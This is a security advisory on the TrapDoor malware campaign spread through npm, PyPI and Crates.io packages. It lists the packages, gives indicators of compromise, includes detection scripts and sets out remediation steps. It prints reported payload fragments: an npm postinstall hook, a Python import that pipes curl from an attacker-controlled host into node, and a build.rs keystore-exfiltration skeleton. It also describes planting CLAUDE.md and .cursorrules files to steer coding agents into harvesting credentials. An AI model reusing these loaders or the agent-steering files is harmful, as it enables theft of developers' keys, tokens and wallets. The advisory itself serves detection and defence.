Severity: critical
CVE: Not assigned
CWE: CWE-506
Affected Surface:
- 21 npm packages including web3-secrets-detector, dev-env-bootstrapper, and prompt-engineering-toolkit
- 7 PyPI packages including eth-security-auditor, defi-risk-scanner, and env-loader-cli
- 6 Crates.io packages including sui-sdk-build-utils and move-project-builder
- Developer workstations, CI runners, and AI coding environments with crypto wallets, SSH keys, GitHub tokens, cloud credentials, or local browser profiles
Socket published TrapDoor on 24 May 2026 after connecting what first looked like isolated malicious packages into a coordinated campaign across npm, PyPI, and Crates.io. The earliest observed package was eth-security-auditor@0.1.0 on PyPI, uploaded on 22 May 2026 at 20:20:18 UTC.
The campaign is aimed at crypto, DeFi, Solana, Sui/Move, AI, and security developers. The lures are named like harmless developer utilities: wallet checkers, prompt engineering helpers, build tools, environment loaders, and security auditors. Once installed, they target the data those developers are likely to have locally: wallets, SSH keys, GitHub tokens, cloud credentials, browser stores, .env files, and AI tool configuration.
Affected packages
The public package list is 34 distinct names: 21 npm packages, 7 PyPI packages, and 6 Crates.io packages. Reporting also describes hundreds of versions and artifacts across those names.
npm
- async-pipeline-builder
- build-scripts-utils
- chain-key-validator
- crypto-credential-scanner
- defi-env-auditor
- defi-threat-scanner
- deployment-key-auditor
- dev-env-bootstrapper
- eth-wallet-sentinel
- llm-context-compressor
- mnemonic-safety-check
- model-switch-router
- node-setup-helpers
- project-init-tools
- prompt-engineering-toolkit
- solidity-deploy-guard
- token-usage-tracker
- wallet-backup-verifier
- wallet-security-checker
- web3-secrets-detector
- workspace-config-loader
PyPI
- cryptowallet-safety
- data-pipeline-check
- defi-risk-scanner
- env-loader-cli
- eth-security-auditor
- git-config-sync
- solidity-build-guard
Crates.io
- move-analyzer-build
- move-compiler-tools
- move-project-builder
- sui-framework-helpers
- sui-move-build-helper
- sui-sdk-build-utils
Three execution paths
TrapDoor is notable because it uses the native execution point for each registry rather than forcing one technique everywhere.
npm: install-time execution
The npm packages use lifecycle scripts to run a shared payload path. Public analysis describes a large JavaScript stealer called trap-core.js in multiple packages.
A representative risk shape is:
{
  "scripts": {
    "postinstall": "node trap-core.js"
  }
}
Once triggered, the JavaScript payload scans for secrets and validates stolen credentials with live services. Public reporting describes AWS and GitHub credential validation, SSH-based lateral movement attempts, and persistence through developer configuration files and startup hooks.
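A pre-install check for the lifecycle-script trigger described above, as an added example that is not code from the original page or from Socket: it reads a v2/v3 `package-lock.json`, where npm marks entries that declare install-time scripts with `hasInstallScript`, and reports the ones missing from a reviewed allowlist. The lockfile excerpt, the `example-helper` package name and the `REVIEWED` allowlist are constructed for illustration.

```python
import json

def install_script_packages(lock_text):
    """Return sorted (name, version) pairs that npm recorded with hasInstallScript."""
    packages = json.loads(lock_text).get("packages", {})
    return sorted(
        # "node_modules/a/node_modules/b" is package b; "" is the project itself.
        (path.rpartition("node_modules/")[2], meta.get("version", "unknown"))
        for path, meta in packages.items()
        if path and meta.get("hasInstallScript") is True
    )

def unexpected_install_scripts(lock_text, allowlist):
    """Return 'name@version' for install-script packages nobody has reviewed yet."""
    return [f"{name}@{version}"
            for name, version in install_script_packages(lock_text)
            if name not in allowlist]

# Constructed lockfile excerpt; example-helper is a hypothetical package name.
LOCK = json.dumps({"lockfileVersion": 3, "packages": {
    "": {"name": "app", "version": "1.0.0"},
    "node_modules/esbuild": {"version": "0.21.5", "hasInstallScript": True},
    "node_modules/example-helper": {"version": "0.1.0", "hasInstallScript": True},
    "node_modules/lodash": {"version": "4.17.21"},
}})
REVIEWED = {"esbuild"}  # hypothetical allowlist kept in the repository

print(unexpected_install_scripts(LOCK, REVIEWED))
```

The check only lists what would run; `npm ci --ignore-scripts` keeps the hooks from executing while the flagged packages are reviewed.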
Persistence and re-entry paths include:
- .cursorrules
- CLAUDE.md
- Git hooks
- Shell profile hooks
- systemd
- cron
- SSH key reuse
The AI-facing files are especially important. .cursorrules and CLAUDE.md can be read by coding agents as project instructions. TrapDoor attempts to make future developer or AI sessions participate in credential discovery under the disguise of security scanning or environment validation.
PyPI: import-time remote JavaScript
The PyPI packages do not need a setup.py install hook to execute. Public analysis of eth-security-auditor describes package import as the trigger:
import subprocess
payload_url = "https://ddjidd564.github.io/defi-security-best-practices/payloads/compliance-scanner-light.js"
subprocess.Popen(["sh", "-c", f"curl -fsSL {payload_url} | node -e \"$(cat)\""])
The key risk is mutability. A package import downloads JavaScript from an attacker-controlled GitHub Pages site and runs it with Node. That lets the attacker alter the runtime behavior after the PyPI artifact has already been published, without pushing a new Python version.
This pattern also crosses language boundaries. A Python dependency can become a JavaScript loader, which can make detection harder for teams that only inspect Python package metadata.
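A static check for the import-time trigger described above, as an added example that is not code from the original page or from Socket: it parses Python source with `ast` and reports process-spawning calls that execute on import (module and class bodies) while ignoring calls inside functions. The sample source is constructed and `example.invalid` is a placeholder host.

```python
import ast

# Fully qualified callables that start a process.
SPAWNERS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
            "subprocess.check_output", "os.system", "os.popen"}

def dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts, node = [node.attr, *parts], node.value
    return ".".join([node.id, *parts]) if isinstance(node, ast.Name) else None

def import_time_spawns(source):
    """Return [(line, callable)] for process spawns that run when the module is imported."""
    tree, aliases, hits = ast.parse(source), {}, []
    for node in ast.walk(tree):  # map local names back to what was imported
        if isinstance(node, ast.Import):
            aliases.update({a.asname or a.name: a.name for a in node.names})
        elif isinstance(node, ast.ImportFrom) and node.module:
            aliases.update({a.asname or a.name: f"{node.module}.{a.name}"
                            for a in node.names})

    def visit(node):
        # Function bodies run only when called; module and class bodies run on import.
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
            return
        if isinstance(node, ast.Call) and (name := dotted(node.func)):
            head, dot, rest = name.partition(".")
            full = aliases.get(head, head) + dot + rest
            if full in SPAWNERS:
                hits.append((node.lineno, full))
        for child in ast.iter_child_nodes(node):
            visit(child)

    visit(tree)
    return hits

# Constructed sample; example.invalid is a placeholder host.
SAMPLE = '''\
import subprocess as sp
from os import system
sp.Popen(["sh", "-c", "curl -fsSL https://example.invalid/p.js | node"])
def audit():
    system("echo scan")  # not flagged: runs only when audit() is called
class Config:
    system("id")         # flagged: class bodies execute at import
'''
print(import_time_spawns(SAMPLE))
```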
Crates.io: build-time execution
The Rust packages target Sui and Move developers with malicious build.rs scripts. Cargo executes build.rs during compilation, before the developer calls any library function.
The reported behavior is shaped like:
fn main() {
    let home = std::env::var("HOME").unwrap_or_default();
    let targets = [
        format!("{home}/.sui/sui_config/sui.keystore"),
        format!("{home}/.move"),
    ];
    for path in targets {
        // Search, XOR-encrypt with a hardcoded key, and exfiltrate.
    }
}
Socket reported a hardcoded XOR key of cargo-build-helper-2026 for Crates.io exfiltration. The target set is focused on wallet and keystore material rather than generic application secrets alone.
Attacker infrastructure
The campaign uses the GitHub account ddjidd564 and content under:
- ddjidd564[.]github[.]io
- ddjidd564[.]github[.]io/defi-security-best-practices/
The campaign marker P-2024-001 appears in related attacker material and pull-request attempts. Socket also reported pull requests against AI and developer tooling projects that attempted to add .cursorrules or CLAUDE.md files. That shows the campaign was not limited to registry publication. The actor also tried to place AI-agent instructions directly into open source repositories.
What TrapDoor steals
Across the observed packages, public reporting describes collection of:
- SSH private keys and known Git credential files.
- GitHub tokens, npm tokens, package registry credentials, and .npmrc.
- AWS credentials and other cloud provider config.
- Browser profile data, login databases, cookies, and local storage.
- Sui, Solana, Aptos, Ethereum, Bitcoin, and other wallet data.
- Environment variables and .env files.
- Local project files likely to contain secrets.
- AI coding tool context and instruction files.
Credential validation is an important detail. Malware that tests tokens through AWS or GitHub APIs can prioritize useful credentials quickly and discard expired material. That accelerates follow-on actions such as source theft, package publication, cloud access, and lateral movement.
Detection and hunting
Search dependency manifests, lockfiles, package caches, build logs, and registry proxy logs for the 34 package names above.
Useful local searches:
rg "async-pipeline-builder|build-scripts-utils|chain-key-validator|crypto-credential-scanner|defi-env-auditor|defi-threat-scanner|deployment-key-auditor|dev-env-bootstrapper|eth-wallet-sentinel|llm-context-compressor|mnemonic-safety-check|model-switch-router|node-setup-helpers|project-init-tools|prompt-engineering-toolkit|solidity-deploy-guard|token-usage-tracker|wallet-backup-verifier|wallet-security-checker|web3-secrets-detector|workspace-config-loader" package.json package-lock.json pnpm-lock.yaml yarn.lock
rg "cryptowallet-safety|data-pipeline-check|defi-risk-scanner|env-loader-cli|eth-security-auditor|git-config-sync|solidity-build-guard" requirements.txt pyproject.toml poetry.lock
rg "move-analyzer-build|move-compiler-tools|move-project-builder|sui-framework-helpers|sui-move-build-helper|sui-sdk-build-utils" Cargo.toml Cargo.lock
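An exact-name variant of the searches above, as an added example that is not code from the original page or from Socket: a plain substring search can flag unrelated names that merely contain a listed name, misses PyPI spellings such as `Eth_Security.Auditor` that resolve to the same project, and says nothing about which nested npm path pulled a package in. The function names and sample inputs are constructed; the package names are the ones listed on this page.

```python
import json, re

# Package names from this page's affected list, keyed by registry.
BAD = {
    "npm": set("""async-pipeline-builder build-scripts-utils chain-key-validator
        crypto-credential-scanner defi-env-auditor defi-threat-scanner deployment-key-auditor
        dev-env-bootstrapper eth-wallet-sentinel llm-context-compressor mnemonic-safety-check
        model-switch-router node-setup-helpers project-init-tools prompt-engineering-toolkit
        solidity-deploy-guard token-usage-tracker wallet-backup-verifier
        wallet-security-checker web3-secrets-detector workspace-config-loader""".split()),
    "pypi": set("""cryptowallet-safety data-pipeline-check defi-risk-scanner env-loader-cli
        eth-security-auditor git-config-sync solidity-build-guard""".split()),
    "crates": set("""move-analyzer-build move-compiler-tools move-project-builder
        sui-framework-helpers sui-move-build-helper sui-sdk-build-utils""".split()),
}

def pep503(name):
    """PyPI ignores case and treats runs of '-', '_' and '.' as one separator."""
    return re.sub(r"[-_.]+", "-", name).lower()

def scan_package_lock(text):
    """Exact-name hits from the 'packages' map of a v2/v3 package-lock.json."""
    # A key like "node_modules/a/node_modules/b" installs b, a transitive dependency.
    names = {p.rpartition("node_modules/")[2] for p in json.loads(text).get("packages", {})}
    return names & BAD["npm"]

def scan_requirements(text):
    """Hits from requirements.txt lines, compared after PEP 503 normalisation."""
    names = re.findall(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)", text, re.M)
    return {pep503(n) for n in names} & BAD["pypi"]

def scan_lock_names(text, registry):
    """Hits from poetry.lock or Cargo.lock, which list packages as name = "..."."""
    names = re.findall(r'^name\s*=\s*"([^"]+)"', text, re.M)
    return {pep503(n) if registry == "pypi" else n for n in names} & BAD[registry]

# Constructed sample inputs.
LOCK = json.dumps({"packages": {"": {}, "node_modules/left/node_modules/project-init-tools": {},
                                "node_modules/my-project-init-tools": {}}})
REQS = "requests==2.32.0\nEth_Security.Auditor==0.1.0\ndefi-risk-scanner-docs\n"
CARGO = '[[package]]\nname = "sui-sdk-build-utils"\nversion = "0.1.0"\n'

print(scan_package_lock(LOCK), scan_requirements(REQS), scan_lock_names(CARGO, "crates"))
```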
Network and filesystem indicators:
- Requests to ddjidd564[.]github[.]io.
- References to defi-security-best-practices.
- Files named trap-core.js.
- The marker P-2024-001.
- Unexpected .cursorrules or CLAUDE.md files containing security-scan or environment-audit instructions.
- New Git hooks, shell profile edits, cron entries, or user-level systemd units created around package installation time.
Remediation
Any machine that installed or imported one of the listed packages should be treated as compromised, particularly if it held wallet material, SSH keys, GitHub tokens, cloud credentials, or registry publish rights.
Recommended response:
- Remove the malicious packages and rebuild the environment from a clean image where possible.
- Rotate SSH keys, GitHub tokens, npm tokens, PyPI tokens, cloud keys, and any wallet seed material reachable from the host.
- Revoke package registry tokens that were present on developer machines or CI runners.
- Inspect .cursorrules, CLAUDE.md, Git hooks, shell profiles, systemd, and cron for persistence.
- Review GitHub audit logs for new repositories, unexpected pull requests, token usage, Actions workflow changes, and package publication events.
- Block ddjidd564.github.io infrastructure and retain DNS/proxy logs for incident review.
The broader lesson is that modern package malware is no longer confined to install scripts. TrapDoor used install-time, import-time, build-time, AI-agent, and repository-contribution surfaces in the same campaign.